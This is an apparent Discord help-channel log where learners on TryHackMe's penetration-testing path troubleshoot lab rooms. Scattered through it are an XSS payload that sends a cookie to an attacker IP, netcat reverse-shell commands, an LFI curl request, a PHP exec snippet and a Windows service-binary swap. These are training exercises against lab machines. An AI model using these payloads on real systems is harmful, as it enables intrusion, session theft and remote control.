i'm getting no error message on the task 8 playground question for the LFI room. On previous attempts I was able to get the error message saying it couldn't resolve hostname so i had to edit my python server to use the IP for the VPN connection but now the page just returns without an error. can someone point me in another direction for troubleshooting?
#junior-pentester-path
screenshots please???
replace cmd.php with hostname.txt
i tried different file types and names. they both have the same content.
it's not even making a request out to the python server
yeah that's my openvpn popup
the attack box?
the VM that THM provides
i'm not
i'm on my pc
i'm not running a VM
it's not running on all interfaces
at the very least
If they're getting the gets then something is going right WRT NAT
Are you making the requests yourself here?
yes that's me just verifying it's working by visiting the site in my browser
if this works in the thm attackbox im gonna scream
It will
it's going to frustrate me to no end that i don't understand why it's not working from my end
Hi Guys, is the Path "Offensive Pentesting" current or obsolete or replaced by "Jr. Pentesting"?
it is older than jr pentesting but it is not obsolete, last shadow heard.... think of it as a continuation of this path if you want
alright, thank you my shadow
Please don't ask the same question over multiple channels, it is spam
ok, sry
For Task 11 of the "Linux PrivEsc" room - the target machine isn't able to execute the compiled C program. Is this intentional? I keep getting an 'exec format error'
That probably means you've done something wrong
Did you compile it on your own machine?
I did compile it on my own machine
Is your own machine ARM?
Cross compilation is a pain in the ass for a lot of setups, as a warning
gotcha thanks - completely slipped my mind
noted - thanks for the heads up.
Gave +1 Rep to @idle bison
I can't get task 6 (Metasploit Exploitation) to accept the hash for the second user??
Can you put the hash in spoilers here?
I'll drop the whole line as well as what I expect it should accept (even though I've tried pretty much any combination I could think of)
||claire:$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc7002:1002::||
||SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc7002||
Done
Between colons, so $6$ to 7002 inclusive
Doesn't like it
Breaking my head on Subdomain Enumeration Task 6. Virtual Hosts
Anyone know what the MACHINE_IP is? like where am I pulling that value from
You need to press "Start Machine"
Go through the tasks until you find the correct one to start
If a room has multiple machines then each task might have a different machine
I terminated my last one and started new one in task 6
it either pulls nothing or a zillion names, but none are the answers
am I supposed to be using the AttackBox IP for MACHINE_IP?
The deployable machine
If MACHINE_IP is not populated, you HAVE NOT deployed the target machine
Remember the definition of insanity is doing the same thing over and over again. Make sure you're deploying the machine with the button in the top right of a task, not the start attackbox button.
Hitting Start Machine just says its started...and gives me no option to view it
am I then supposed to do Start Attackbox?
isn't there something in that definition talking about expecting the same or different results too???
Well, also yes.
Correct, the in-browser access for target machines is very very very rare.
speaking of that, I'm unclear on what's going on with accessing stuff. via OpenVPN. Is it meant to let me do the lessons in my own terminal?
or is my only option attackbox or Kali
Yeah you can use the VPN to connect to the network
URL encoding or base64?
....//....//....//, i guess
Lol, I meant using either of those to encode the traversal or whatever. With it being php, URL encoding would probably work best.
Which task you are doing?
I dunno, it wasn't my task. I was replying to this message.
Under "Content discovery"-> Manual Discovery - Favicon, the md5 hash value is not found in the site https://wiki.owasp.org/index.php/OWASP_favicon_database. So unable to answer the question.
Using the curl command
Yes in attackbox, yes i am a subscriber
So what's the value you get ?Maybe put it in spoiler
Hi guys
nmap: can someone explain to me what -sC does exactly? I understand that this applies nmap's default scripts to the respective ports, but what kind of scripts are these or what is the purpose of the default scripts?
yes
but somehow I don't get any smarter from it ^^
ok these are the respective scripts. And these are all executed, correct?
you mean RTFM?
thanks, i will do more research. I wonder if by enabling -sC then the other scan types are not used like TCP SYN Scan. I guess I didn't describe my question well
I'd better do some research.
Are you adding the 16541 to your search?
As I assume that's just the speed specification of curl
Yes i was adding, should i remove that?
Sure, that's not part of the md5
Yes you are right, omitting that i find the hash value. Many thanks
If you could maybe consider deleting that message or putting it in a spoiler, so others have to do it on their own, that would be great
Sure, deleted. Thanks
Can someone explain to me what this meterpreter is? I googled it but I'm confused
It's a shell like bash or zsh that has commands specifically for exploitation and whatnot.
payload that is used to access reverse shell on your msfconsole
Doesn't have to be reverse shell, can be a lot more. Not used to access a reverse shell.
Meterpreter is a specific type of shell
yeah man.
Why can't I get a 500 Internal Server Error in the Burp Suite Repeater room? I'm changing everything in repeater! Just can't seem to get it
Most likely because you haven't tried every single thing that's mentioned in the hint
I have a super newbie question about File Inclusion. Task 4: Local File Inclusion - LFI. I can't figure out the path for question 1 which is "try to read /etc/passwd. What would the request URI be?"
It doesn't seem to be something like "lab1.php?lang=/etc/passwd"
Hint or examples confounding me maybe, idk. Any tips would be appreciated, cheers.
Okay, it worked in the answer but not in the lab. Weird
Screenshot of what's not working in the lab?
You will have to verify first in order to send some.
Or did you solve it meanwhile?
!docs verify
I think it was actually working, I just failed to realize it, since the preview was a bunch of gibberish. I mistook it for an error
@shadow echo I am blanking on the RFI playground though.
I love THM. But the "one forum for all tasks" thing is hella confusing to read xD
Well I'm not totally sure if I can follow your latest 2 sentences
Oh I mean the File Inclusion Lab Playground
Ye, but what you mean with you are "blanking" on it?
Also, the "one forum for all tasks" ?
Oh, as in, it just says "go do something" but following the examples I can't get it to work
like file inclusion has 8 tasks, but only 1 forum page. People are talking about tasks 1-8 all mixed together. It's difficult to read or find what you need
Oh, you mean the actual forum, so "tryhackme.com/forum" ?
Tbh, I never used that yet so I can't comment on that
Yeah
But, if you verify your THM profile here in discord, you are able to send screenshots to show what exactly you are stuck with, which makes it much easier to help, thus people will most likely reply to your question
Oh. I didn't see a verify
!docs verify
Not a problem.
So if you explain which step you are exactly stuck with and maybe provide a screenshot of it, I'll happily help you
Here, I am following the examples to no effect. Do I have to create a cmd.txt file in attackbox? or on my local machine even?
Well it basically doesn't matter where, all that matters is that the file you create has to be somewhere reachable for the target machine.
right
So if you are using the attackbox as your attacking machine and not your own local machine, I suggest doing it on the attackbox
Otherwise on your own machine
thanks
That's it? I somewhat think there is more you are stuck with
Haha, yeah I skipped that and am doing Challenge 1
about the POST request with the form
Oh, okay
I have changed the method to POST and am testing resending
muahaha, I figured it out
this is fun
Hello
Stuck on capturing flag 3 for Task 8 of LFI. I managed the other 2. The hint isn't really helping me, or the forum. Any suggestions here? Cheers
you might need to use burp for that..... and for another hint: POST
I think I tried that but messed it up so got off course
seems like I had the right idea, but wrong implementation
cheers
good luck and hope you get it soon
oh yeah using curl for it should work nicely too
|| curl -X POST THMIPGOESHERE/challenges/chall3.php -d 'method=POST&file=/etc/flag3%00' --output - ||
you can also use postman installed on machine
I am not really good with curl but this request seems wrong to me; when you use POST you usually want to have a body
haha, well it works and shows the required answer
I believe --output - is doing it, body is showing
curl supplies some defaults
i did no burps training lol, i think this is part of my issue
also learning how to use curl is really helpful for a lot of website messing around
so the whole reload/send/forward/proxy etc sometimes is off a step
I prefer terminal to burps, but i realize I should use both..
i will check out postman also thanks
Gave +1 Rep to @mystic plume
@flint owl are you sure you got your answer ? Because you need to read file that is in /etc/flag3 but you are not located in the root (/)
Postman is basically interface for curl, it can also give you curl command, I find it more user friendly, but I guess at the end of the day curl is better
easy enough to .. up.... but think it runs for the root dir when you do it the way they did anyways
Yes, I got the right answer in THM answer field
I used ../../../../ at first, but its not actually needed in this challenge
it works both ways, with or without
so the directory traversal isn't required i guess here
Strange, I thought the point of the chall was to show how to move and read the content of files; guess the other challs demonstrated that
yes
well sometimes you don't need the .. because it accepts absolute paths as the value of the variable already
I just didn't figure it out when I was doing it lol
not like the ../ tend to hurt things ¯\_(ツ)_/¯
Principles of Security room, Task 4, Questions 2 & 4, the answer should be Biba but was rejected
That's not the correct answer
Ah. My bad
yo guys idk if this the right channel to ask this but anyone know a really good course for learning OWASP TOP 10 ?
TryHackMe, and learning how the technology actually works behind the scenes.
is there a link to it in tryhackme ?
or you mean
https://tryhackme.com/room/owasptop10 ?
The OWASP Top 10 is a collection of 10 distinct web vulns. THM has lots of content teaching each, for most of those 10 issues.
i see thanks for answering i will try dig to find the path unless #web-fundamentals-path is one of them
Gave +1 Rep to @idle bison
There is much much more to THM than the paths, search on https://tryhackme.com/hacktivities?tab=search
@heavy night Can you see what I mean about people only thinking there's the path content and nothing more?
yea, i thought there was only path content and no actual teaching. i did take a course from college in my country but i wanted to go through owasp top 10 since it's been a while and i kinda don't remember most of the stuff. i will check this, thanks again
how the hell can i copy stuff out of nano
By googling how to
i mean i did it exactly like google said
alt a
alt 6
and pasting with ctrl u
if i use ctrl u here
it just opens the source code
incredible really wasting an hour on how to copy and paste some stuff in linux...
loading the website running on the machine in my task is very slow to load into
i have the vpn on and for some reason it has always been slow
machine is running
and im connected
but it takes forever to load
it loads eventually but thm will ask me to go to a different page or reload the page in some way and it takes forever to get through any box that asks me to do this
seems to only happen on the learning courses though as practice boxes with a site run perfectly fine
Which rooms or path should I do following jr pentester
If you want shadow's recommendations, it is in this order
#pre-security-legacy-path
#974406074444685322
#junior-pentester-path
#pentest-plus-path
#web-fundamentals-path
#offensive-pentesting-path
#791764435991658556
Why that order when the PenTest+ path is rated as easy while the Jr PT path is intermediate?
Ctrl+shift+c maybe
because the junior pentest path covers more stuff than pentest-plus, making it an easy break afterwards
Gotcha.
Middle wheel? ctrl+shift+v?
Thanks Ninja - It's something we're exploring, the new learn page outlines better content and we've seen a higher retention rate for users using the new page. Hopefully this helps? We're also having a "Try this path next" after a path is complete.
Gave +1 Rep to @idle bison
Did you have any ideas on how we can better show users path progression?
It's whether they know that there's more on THM, beyond just the paths
perhaps you can have similar recommended rooms at the end of each path module so users can explore more of the site beyond whats on the learn page
Question, would you recommend pre-security pathway before The-Complete-Beginners pathway? Or vice versa
in the list shadow provided they would place complete beginner after web fundamentals.... partly because of how outdated and planned for removal it is
making it hard to learn from it to a decent degree
complete beginner is outdated no?
Oh wow, didn't know it was being planned for removal
or maybe they will just update it heavily but then shadow dunno why they made new paths to kinda replace it
@misty sonnet not sure that it was
@sage current interesting. Thanks for your feedback
Gave +1 Rep to @misty sonnet
no problem
Under "Junior Pentester Path" -> "Authentication Bypass" -> "Username Enumeration" there are questions stating "what is the username starting with si". After running ffuf, i only got one username. Is the expectation to open the names.txt file and try giving all the usernames which start with "si"? This is a huge list and it's like trial and error. Please let me know if this is the method to be followed
Hello, I'm getting the below on the console that runs openvpn and when this happens, my connection stops.
TLS Error: Unroutable control packet received from [AF_INET]18.202.129.195:1194 (si=3 op=P_CONTROL_V1)
Any advice?
Please is it advisable to have Kali as a standalone os instead of having both windows and Kali installed on different partitions?
#site-support please
Thanks @steel nymph
Gave +1 Rep to @steel nymph
SOLVED
Hi guys
got that screen on my browser attack box
linprivesc room
thought it was a bug
bc that appeared instead of the attack box
closed attack box and started it again. it works now
Hi guys
im right now stuck here
i've got the exploit and compiled it and started a http server on my machine
every time i try to wget from the target machine
i get the error below
that's the permission set
don't understand why it needs write permission?
Because you are most likely in a directory you have no write permission in
The thing you're wgetting needs to be put somewhere, so you need to call it from a directory you're able to write to .
How do I get permission to upload images here? I am stuck with something and I wanted to share the screenshot
NVM Got it
Fuuuug I just finished the Windows room two days ago and they revamped it. You already know what I gotta do
I guess, at least, it's good repetition
not sure what I'm doing wrong on task 8 RCE. I'm serving the file and tried using both GET and POST method in burp but I'm getting a weird error
is there something wrong with this? <?PHP print exec('hostname'): ?>
I tried removing the ":" but then the request just loads forever
hello guys can someone help me with the windows privesc room?
im in task 5 and im trying to swap the executable of a service with a msfvenom payload that i already moved to the target machine but i cant seem to get the reverse shell to my nc listener...
i did:
cd C:\PROGRA~2\SYSTEM~1\ ## to move to the service executable directory
move WService.exe WService.exe.bkp ## to change the name of the original executble
move C:\Users\thm-unpriv\rev-svc.exe WService.exe ## to move the msfvenom payload to the directory and changing its name to WService.exe
icacls WService.exe /grant Everyone:F ## to grant the everyone group full permissions
then i stopped the service with "sc stop windowsscheduler" and i opened the nc listener and started the service again with "sc start windowsscheduler"
Hello
I am stuck on content Discovery task 12 (can some one tell me acme IT URL ?)
The URL is the target machine IP
thanks but I can't get the question's answer
Gave +1 Rep to @shadow echo
any hint ?
Well I don't know what you are stuck on, did you fuzz the directories?
yes and gave a lot of directories !
Just ask the question directly. Someone will answer if they can.
There are a lot that start with "/mo" ?
ya
Show me a screenshot pls.
You will have to verify first in order to do so
!docs verify
I will share later ,, now i have to go ..thanks for your help
hello guys, i have been stuck from task 3 upward. i think there's a problem with the attached lab; each time i try using PowerShell it freezes up. what can i do? or is there anything i'm missing? i really will appreciate some help as this is the last step of the whole session
i really would appreciate not sure what else to do helpppppppppp
Jnr Pentester: WINDOWS PRIVILEGE ESCALATION
Hi everyone.
I can't get the reverse shell in task 7 of the Windows Privilege Escalation room. Can anyone please guide me and help with the payload?
I'm having the same problem with task 4, I can't get a reverse shell. How do you sort that @modest arch
Please
Having some trouble figuring out how to get the user passwords in Linux PrivEsc. I managed to get the answers by guessing, but I would like to know how to actually do it.
I have root access, and used cat on both /etc/shadow and /etc/passwd. I copied their contents into files on my machine, ran unshadow on them, and tried to use John the Ripper with rockyou.txt. I've tried to do it both with the full shadow/passwd, and with everything but the "matt" line removed (for task 9). It will do like a hundred cracks, then just stop without a result, as shown below.
I don't know if I'm using John incorrectly or if there is something I'm missing? But it's really bothering me
Which linux privesc room is it, since there are more than 1?
Also which task?
This was for task9 on the one with the capstone challenge. I ended up having to use John on the attackbox for it to work, the screenshot was from my own machine
A lot of my problems seem to stem from doing them on my own machine rather than using the attackbox, so that's probably the issue. Just not sure why it does that, since it should in theory be the same
You need to be able to get your hands on it or know what's been done; it's not all about the answers my dear friend
Except if you are doing the right thing but having some technical issue, then I don't see why you should get the above
That would be cheating, please do not ask for answers
Hello, good morning my dear friends. I know the time zone is different for everybody but I could make use of some help in task 5 of the new Windows Privilege Escalation room. I have done all the right things but each time I try to download my payload from Kali to Windows PowerShell in task 5 it keeps failing and displaying this. Am I missing anything, or can anyone kind of let me know what I'm supposed to be doing and I'm not? @idle bison @willow nova
Please don't ping people to request help
Okay thanks
Mods are not support staff, and support staff do not provide support through discord
kk
@idle bison don't take it too personal, if you can't help just say it..... it's that simple, a lil hint here and there would go a long way, not like I'm even asking for the answers...
The problem is that you're pinging people to demand help
Don't do that.
It's rude.
Yessirrrrrrr
What do you have on display ?
Hey, I'm having the same problem in task 5. It won't let me download the payload from Linux (after hosting my http.server) into PowerShell (Windows) even though I'm doing the right thing. Do you have a hint? I'm thinking maybe something is wrong with the lab?
It won't let me send a picture here so I sent it to your dm my dear friend. It's okay if you can just check it, not so important you reply or anything
Hello peopleeee, I'm working on the Windows Priv Esc room, Abusing dangerous privilege section.
Executing smbserver.py gives me a traceback error
Exception: Version mismatch: this is the 'cffi' package version 1.14.2, located in '/usr/local/lib/python3.6/dist-packages/cffi/api.py'. When we import the top-level '_cffi_backend' extension module, we get version 1.11.5, located in '/usr/lib/python3/dist-packages/_cffi_backend.cpython-36m-x86_64-linux-gnu.so'. The two versions should be equal; check your installation.
and I cant run sudo apt-update on the attackbox. Any help?
!docs verify
Once you do that, send a screen of the command you're running in PowerShell. Make sure you're including the port number in wget
There are steps to resolve the apt issue pinned in #site-support
Thank you. I should have looked there first. Been staring at the screen all night lol
Hi All, I posted this somewhere else, but maybe here is more appropriate. Could somebody take a look at my shell for the Linux PrivEsc: Crontab section? can't seem to catch it and everything seems to be in order from here
Is your file executable? Does it have the permissions set right?
its a currently existing cronjob that executes once per minute from the home directory, so i'm guessing no issues with that. will double check ,thanks
legend

thanks buddy. kicking myself for that one!
Gave +1 Rep to @idle bison
oh i was wondering about that. thanks
Happy hacking!
(Y) verified also. nice one
Hi, I'm doing Windows privesc Task 7. I'm following every step right but I'm getting admin priv.
not*
Hello, what do you guys do when the IP is not showing?
In the task Instead IP , I see MACHINE_IP
Start the machine, then give it time to get up and running.
Hi, I need guidance related to Burp Suite Decoder, task 4. I downloaded 4 keys and tried encoding with MD5, then MD5 hash to ASCII text, but for all 4 keys I couldn't get the same MD5 hashsum as provided. Can anyone please help me solve it?
Hello all,
I'm going through the Jr. Pentester path. I'm at the last stage of the XSS where I'm supposed to send the cookie back to me using:
</textarea><script>fetch('http://{URL_OR_IP}?cookie=' + btoa(document.cookie) );</script>
I'm swapping {URL_OR_IP} for my IP within the VPN together with the port 9001 ( IP:PORT) in a way that would like ( not putting my IP, just an example )
</textarea><script>fetch('http://10.10.10.10:9001?cookie=' + btoa(document.cookie) );</script>
On the side i have netcat listening on the port 9001. But when i open the ticket created, i don't get anything back
Make sure you hash the whole file, not just the key in the file. Everything in the .txt including the whitespace gets factored into the hash.
I just went through that module yesterday and made the same mistake.
iirc, the flag isn't in the ticket but rather in the request sent to the terminal you're running nc from.
Hello Guys Active Reconnaissance Lab from Junior Pentester Path, cannot connect through telnet
it says Connection closed by foreign host.
any help?
I'm using the Attackbox
Use the attackbox.
can someone help me plz on Windows Privilege Escalation task 4?
Hmm I'm going to try but in theory should be the same effect. Will let you know
Nope, it's a bug
i can't get the reverse shell via schtasks, but it's written that "SUCCESS: Attempted to run the scheduled task "vulntask"." and the code is ok ....
I solved it using md5sum command. Its far more easy than copy pasting.
Indeed it work! Thanks man
Gave +1 Rep to @idle bison
Yo
hello, I am trying to scan some target machines in the room Nmap Advanced Port Scans. However, when it asks me how many ports are unfiltered, I cannot find any even after I change the aggressiveness
Is there something I am missing or is there a problem with the room since I didn't have this problem in different rooms or same room different task
Hi, are you using the FIN scan or the NULL scan? And are you scanning all ports?
Hi Gang. I'm doing the last task in Windows PrivEsc and I'm a little confused about the payload.
It's dll hijacking, and i can see where I should be getting the payload to execute and everything, but how am i supposed to know which port to use? (they have provided a payload with the attackbox)
I can make my own payload and do it that way, but this has me thinking maybe i'm confused.
I am doing the exact same thing that someone else does in the writeup with a different consequence
you can terminate and initiate again the VM, may be something was not correctly set (it had happened to me).
or you could try to issue the same command from the Attack box. I have just tried it and it worked
so, is there a way of checking if my payload is erroring out? currently I have
("C:\tools\nc64.exe -nv 7420 -e cmd.exe")
can i just add '> output.txt' or will that mess up the nc connection?
its for the dll hijacking. for context, this initial example payload worked fine, so im guessing the dll is compiled correctly
#987074227335233607 and you need double slashes in your command and there should be your ip in there somewhere too
double slashes? yes i have ip in there, sorry i forgot to write above.
oh shit, like C:\ \tools\nc64.exe ... ?
C:\\tools\\nc64.exe 10.10.10.10 1234 -e cmd
the double slashes? you have to escape them, cuz they're used for stuff like \n (new line) and such
i see! thank you so much for the help!
Gave +1 Rep to @maiden stratus
Jr pentest pathway, windows privilege escalation, task 6 (Abusing dangerous privileges):
Whenever I run:
/opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL
I get the following error:
Traceback (most recent call last):
File "/opt/impacket/examples/secretsdump.py", line 61, in <module>
from impacket.examples.utils import parse_target
ModuleNotFoundError: No module named 'impacket.examples.utils'
I have tried just about everything I could find online but if anyone else ran into this problem and knows a fix I am all ears.
also I have been using the thm attackbox. I tried a few times on Kali but still wasn't able to figure it out.
are you sure the script is in that folder???
Yes. Thats the path that they say to use one thm as well.
I've tried downloading the utils.py from github but it still says that same error
You need impacket properly installed
I believe I tried that by following the github page but it didnt work. do you remember how you did it?
Yeah, either a proper install with pip or github, or settle for the likely older version in Kali repos
If you're having trouble, use the attackbox
well they already tried the attackbox above it seems and that did not work
I did. I think I might try it on kali later. I found some install instructions for it. ill keep you posted.
I'm tackling this room tonight, so if I work through it, I'll ping ya.
so I did the following to get the secretsdump.py working
from ~ directory:
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
sudo apt install python3 python3-pip
sudo -H pip3 install --upgrade pip
sudo python3 setup.py install
pip3 install -r requirements.txt
/usr/bin/python3 -m pip install --upgrade pip
python3 -m pip install .
I have no doubt some of those are redundant but that's what I did. I now, however, can not get the psexec.py to work properly
and instead of using the path they say on thm, I used:
/root/impacket/examples/<pythonfile>
while in the "share" directory where the sam.hive and system.hive were located.
So is burp suite like a nice all in one tool?
for web-based stuff, yeh, but you need to pay (~$350) for the pro version to be able to properly use intruder and the scanner and a bunch of its plugins :/
So that's more for professionals and people who have organizations able to sponsor that sort of software
Why I'm not getting MAC address in Null Scan.
Like here :
is it due to version change or what? Anyone please guide. Where I'm mistaking
Yes It is.
Nmap Advanced port scanning
What's wrong
Host is up
I tried with -PR -sn, But still the same.
Attackbox would be on same layer2, VPN is tun rather than tap so only layer 3?
Yeah maybe. But is there any tag to get MAC address outside the network?
How would you?
Due to encapsulation, you can't see that info
Hey people, I am working on the Windows PrivEsc room in this path and I can't figure out why my RevShells get deleted by the Anti Virus (Yesterday it wasn't happening) any idea why? 
nvm I managed to fix it 
Jr pentest pathway, windows privilege escalation, task 7. could somebody give me a hint please. After I start the modify/repair function on the VNC Server, I cannot locate the vncserver-old.exe file it is not in the Temp folder of the user. Thanks for any help
Hi everyone. After doing the nmap rooms in the network security section, one question remains: if nmap runs a TCP SYN scan by default, in which scenario would one use the -sS flag?
Is that as regards one of the questions in the rooms, or just a general question on why that flag exists?
It's a question that came up by reading the nmap rooms. Wrong place to ask?
it only runs -sS by default if run with sudo/root
also, specifying a specific scan type makes it clearer what happens in writeups and documentation
Ok, makes sense... Thanks!
can I get help with this task in the new "windows privilege escalation" room
the task exploits a vulnerability in RealVNC 6.8.0 using a created malicious .dll file, and then after following the steps of creating the .dll file it asked me to change the payload that exists in the script to perform a reverse shell, but it doesn't work for me.
appreciate any help.
Did you manage to get it so that it produces the output.txt file?
yes
So you know it runs whatever line of code that is, so replace that with the reverse shell.
As it notes, nc.exe is already on the machine.
Make sure you pay attention to the syntax of the reverse shell in that line of code, it's written in C. There are some hints in the forum posts about it
You'll only see that file for a brief second in that folder, what you're looking for is output.txt in C:\ to confirm the repair is running the line of code
I'm now trying this payload:
system("C:\tools\nc64.exe ATTACKER_IP 4444 -e cmd.exe");
yep just pay attention to the syntax and how many backslashes are used, compare it to the original formatting in the notes for that step:
okay I'll try this payload : system("C:\\tools\\nc64.exe ATTACKER_IP 4444 -e cmd.exe");
Hello Friends, I have a question can't we detect OS using OpenVPN. Because I'm not getting OS info using OpenVPN. It's only detecting OS with AttackBox
Is it due to number of hops or THM security check.
Does wgetting the dll for the last flag of the Windows privesc room corrupt the file or something? I managed to get the flag bringing it over via SMB, but from two clean runs, I couldn't get the output.txt file to show wgetting the file from my box to the target.
It's possible I screwed up the compilation process I suppose, but it went weirdly smoothly when I changed tacks.
same issue for me, wget file size was 2kb, smb was correct file size
For that you may have saved the header, not the data. I got just under 300kB through wget the first time when it didn't work, then closer to 330kB when I went through SMB.
Most likely, I should have paid more attention
Finally I did it !!
The mistake I made is that I was copying the wrong .dll file to the share
the wrong file name is : adsldp.dll
the true file name is : adsldpc.dll
Thanks for your help @woven pewter
Gave +1 Rep to @woven pewter
no problem
I've a question. I'm at Subdomain Enumeration task 6.
There is this:
user@machine$ ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://10.10.12.146 -fs {size}
This command has a similar syntax to the first apart from the -fs switch, which tells ffuf to ignore any results that are of the specified size.
The above command should have revealed two positive results that we haven't come across before.
Answer the questions below
What is the first subdomain discovered?
I know the answer, but what is the goal of this task? What can I do with that subdomain, because the "<answer>.FUZZ.acmeitsupport.thm" site doesn't work?
The subdomain is instead of FUZZ, so it would be answer.acmeitsupport.thm
My answer is correct but the link doesn't work. That's not a problem because I understand the meaning
Thanks
Yes, if you add that subdomain and IP to your hosts file, you should be able to open the page.
Ah, it has to be added to my hosts file of course.
I'm in the Vulnerability Capstone room, and I'm at my wit's end. I'm using the exploit.py script and following all the directions in all of the walkthroughs I've come across dutifully. This includes setting up a Netcat listener. Yet every time, the exploit.py shell_me command returns "No result." I've tried different port numbers. I even tried launching a new VM. Nothing is working, and I'm starting to wonder if this is a flaw in this room.
use the hinted exploit from the attackbox for that
all the others don't seem to work now for some reason
or you could download it here but that feels sketchy to shadow:
I am using the hinted exploit from the Attackbox. It's plain not working. It just keeps returning "No result" instead of a cmd line.
???
could you verify and send a picture of what it is outputting please???
!docs verify
Thanks! I wondered why I couldn't upload images. This is what it's outputting.
Gave +1 Rep to @sage current
As you can see, trying different port numbers does nothing.
do you have nc -lnvp 5345 running in the other tab???
Yes I do!
I've tried starting the listener both before and after running exploit.py. It doesn't matter. I still get "No result," each and every time.
It's asking you to enter your attacking machine IP, not the target machine IP
Sorry, got busy with other stuff, but luckily fontaene could answer with the same thing shadow was about to.
I'm so happy I completed this room. I struggled with it on Saturday evening, before I left for a holiday. I completed it sitting here in an Airbnb. On to Metasploit!
Hi everyone. I'm in the 'What the Shell' room in task 13 'Practice and examples', question 'Upload a webshell on the Windows target and try to obtain a reverse shell using Powershell'. I can connect to the target machine using RDP, I created a php file on my system as explained in task 11, and uploaded it to the Windows server on the target machine. Then I browse to the file to execute it and, as a parameter, I am passing the Powershell command from task 8, with my IP and port, URL encoded. I have a listener active on my system. But I get an 'Access forbidden' error sent back by the web page, and the listener isn't getting a connection. Any idea what I'm doing wrong?
OK, I'm on the LFI Challenges, and on the second box, I figured out how to escalate using the cookie, but when I try any php entries, nothing gets returned.
and... I thought about it for like 10 seconds after posting and I think I have a solution
nah, thought I had it, dang it
And 4, I can get it to run echo commands and make it say whatever I want, but if I run hostname, there's no output
sigh
Guess I'll try again tomorrow!
<insert banging head into wall meme here>
Hey Guys!
I'm facing some issues with the "Basic Penetration Testing | John Hammond" room.
I'm trying to scan the machine with the VPN, but there is an error about ports in ignored states.
The VPN diag is fine.
[TryHackMe ASCII-art banner from the THM connectivity check script]
@MuirlandOracle
[+] Stable internet connection
[+] OpenVPN is installed
[+] tun0 exists
[+] tun0 IP is in the correct range
[+] Only one instance of OpenVPN is running
[+] Confirming connectivity
[+] Connectivity checks completed!
[+] You are connected to the TryHackMe Network
Your TryHackMe IP address is: 10.6.36.104
Happy Hacking!
┌──(kali㉿kali)-[~/thm]
└─$ sudo nmap -sC -sV -oN nmap/initial 10.6.36.104
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-28 11:31 EDT
Nmap scan report for 10.6.36.104
Host is up (0.0000040s latency).
All 1000 scanned ports on 10.6.36.104 are in ignored states.
Not shown: 1000 closed tcp ports (reset)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.06 seconds
The IP looks wrong?
Have you started the machine and got the correct IP? It should start with 10.10.x.x
Strange...
this is what I got:
Oh, my bad man.
Thank you for your help!!!!
I'm happy to report, I got both flags after knocking myself unconscious (and reading some forum posts)
Hi Guys
I have specified port 80. Why are other ports scanned when I explicitly specified -PS80?
Sure, it's a TCP SYN ping scan.
Yes, I just want a TCP SYN scan on port 80 only.
no
because I just want to do a TCP SYN ping scan
There is a difference between -sS (TCP SYN scan) and -PS (TCP SYN ping scan).
Am I misunderstanding something?
you are missing the -sn flag
You have not specified to do a ping scan in the first place, that would be with the -sn flag as shown in the screen
Shocker.
https://nmap.org/book/man-host-discovery.html -PS 80 means it will use that port for the host discovery part of the scan
Then it will scan any hosts that it finds as "up"
yes, thats my goal. host discovery
So if you just want host discovery and no scan, you'll need to explicitly state that as shadow and fontaene said
The nmap documentation is absolutely excellent
Sure, I read them too. Sometimes, unfortunately, I overlook something. If I find something in the documentation, I don't write it in here. I only write in Discord when I can't find something or am blind again.
What I'm saying is that the doc is very good, THM is very good, and the THM discord is also very good. Thanks for fast feedback π
@earnest flower I have a question for you, did you have your own framework (Kali for example) for the eJPT... you don't get access to a virtual machine or anything for it right? just an OpenVPN connection?
You can try "tldr". For quick overview to manual pages.
You connect through your own box, yes, whether that's your daily driver or (I'd hope) a VM. That is one thing about their training I'm not a huge fan of, because they've moved towards the browser based stuff.
While the exam itself requires your own system.
Cool, thanks for the response! I gathered as much, just wanted to confirm!!
Yeah, I'd have Kali spun up on a VM
How can I know if a website set new cookies from devtools?
Depends on the browser you are using.... In the Chrome console it's under application -> cookies, and I think on Firefox it's under the Storage tab
No problem. Good luck!
I think I'm a ways off, but it's probably just imposter syndrome lol... I literally used to be on a red team, but that was a few years back, just getting back into it now (although being a network and security engineer helps keep me fresh on some things)... Plan was to do the Jr Pen Test course here, run a few HTB stuff, then do the INE coursework and then take the test... That's probably overkill, but I like to be prepared... Then I'm going to work towards Pen+ and then (big gulp) OSCP next year... Always been a goal of mine
I mean, I don't know what your timeline is, but yeah, that's a bit overkill. Between the JPT path and Wreath, you should be more than equipped to handle the eJPT, but be sure to review their materials, too, because some of the stuff on the exam is particular to techniques they teach.
But I'm taking the CySA+ this weekend and then starting the PEN-200 Sunday, so we'll see how it all compares!
Nice, I have Sec+ and like 14 years related experience lol, so we'll see... I'm trying to get the eJPT and Pen+ by November because I have a notional job opportunity... Then OSCP within a year
Bro, with that much experience, you should be able to get through all that well before then. You saw the resources I linked for the PT+?
No? Can you please point me in that direction? I just saw you had eJPT as a role lol
The PenTest+ path on THM plus Jason Dion's Udemy course for the exam. It's got the lectures for both the retired 001 and the 002.
Mind if I shoot you a friend request? You're welcome to dm me with more questions whenever.
And I would contend that they're both about the same level of difficulty, with one showing a more technical focus and one more knowledge based.
Nice, yeah that would be great!
ah cool, thanks for the tip
Gave +1 Rep to @south olive
I am having a problem with the Windows Privilege Escalation room, the DLL part. Every time I run x86_64-w64-mingw32-gcc with the required parameters I get this as the response:
x86_64-w64-mingw32-gcc -m64 -c -Os proxy.c -Wall -shared -masm=intel
-m64: command not found
Does anyone know what I am doing wrong?
@hardy lagoon can you show screenshot? its like its executing on a new line or something
And they were never heard from again
It is all on the same line
-m64 is the output i get
x86_64-w64-mingw32-gcc -m64 -c -Os proxy.c -Wall -shared -masm=intel
Discord trims it, it is all on the same line
It does not recognize any of the parameters
AttackBox or own Kali/VPN?
Attackbox
Weird, because my first guess would have been on Kali and you just haven't installed the package.
Nope the package is indeed installed
A bit strange
I'll try to uninstall it and reinstall it again.
Yeah, that's super weird. It ran just fine for me.
@hardy lagoon If you verify, you can post screenshots.
!docs verify
